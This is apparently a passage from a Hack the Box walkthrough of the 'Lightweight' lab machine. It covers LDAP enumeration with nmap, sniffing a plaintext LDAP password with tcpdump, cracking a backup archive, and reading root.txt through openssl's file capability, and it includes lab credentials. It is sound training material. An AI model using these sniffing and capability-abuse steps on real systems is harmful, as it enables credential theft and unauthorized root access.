nmap -Pn -p 389 –script ldap-search 10.10.10.119

Luckily! Nmap listed two ldapuser1, ldapuser2 usernames along with a hash of their password from the result of nmap scan, yet we did not crack them.

Since we know that http service was running on port 80 therefore, we navigate to web browser and browse target IP and welcome by following page where we saw “This site is protected by against bruteforging” that mean fail2ban could be running inside VM moreover we found three hyperlinks.

When I opened the user.php hyperlinke I read the highlighted text and according to this text a user in the machine has been automatically added for us.

Exploiting

Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flasg therefore I thought to identify the binary capability files with the help of getcap and saw fruitful result.

ssh 10.10.14.10@10.10.10.119

getcap -r / 2>/dev/null

As we have seen in the above image that tcpdump has the capabilities to capture all network traffic even in a low-privileged access, therefore I trigger the following command to inspect ldap connection traffic if possible.

tcpdump -i any -X port ldap

And then navigate to the browser to activate authentication via status.php, since the loading takes time. There's something behind the action has to be happen.

As result we observe the following traffic, as predicted, where I found ldapuser2 password in plaintext.

Then we switch the user with following credential and obtain our first flag user.txt

Username: ldapuser2

Password: 8bc8251332abe1d7f105d3e53ad39ac2

Privilege Escalation

Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection we need to transfer this file my in our local machine.

cat backuo.7z |base64

So, I copied it in our machine and try to extract the file, but it was password protected.

Then, by using an online link "lostmyoass.com," I try to break the password key and then find out the cracked password: delete as in the image below.

And use the "delete" password to extract the directory. I found some php files here and we looked for a status.php file among those files.

The status.php file reveals the password of ldapuser1 as shown in the image.

Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1

su ldapuser1

password: f3ca9d298a553da117442deeb6fa932d

This time once again I checked for file capacity where I saw openssl has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through openssl.

getcap -r / 2>/dev/null

./openssl base64 -a -in /root/root.txt | base64 -d

SP eric: Vulnhub Walkthrough

Covert Channel: The Hidden Network

Hack the Box: Teacher Walkthrough

Hack the Box : Irked Walkthrough

SP ike: Vulnhub Lab Walkthrough

Web Server Lab Setup for Penetration Testing

Code Execution from WinRAR

DC-2 Walkthrough

DC-3 Walkthrough

PowerCat -A PowerShell Netcat

Transafer File

Bind Shell

Execute Powershell

Tunneling or Port Forwarding

DC6-Lab Walkthrough

Born2Root: 2: Vulnhub Walkthrough

Get Meterpreter Session Alert over slack

DC-4 Vulnhub Walkthrough

Penetrating Methodology

Development: Vulnhub Walkthrough

Sputnik 1: Vulnhub Walkthrough

Scanning

Enumeration

EXPLOITATION (SPLUNK)

Access Victim’s Shell

Privilege Escalation

Silky-CTF: 0x01: Vulnhub Walkthrough

Vulnhub Walkthrough: uknowndevice64 v2.0

Walkthrough

Scanning:

digitalworld.local-BRAVERY: Vulnhub Walkthrough

Lightweight: Hack the Box Walkthrough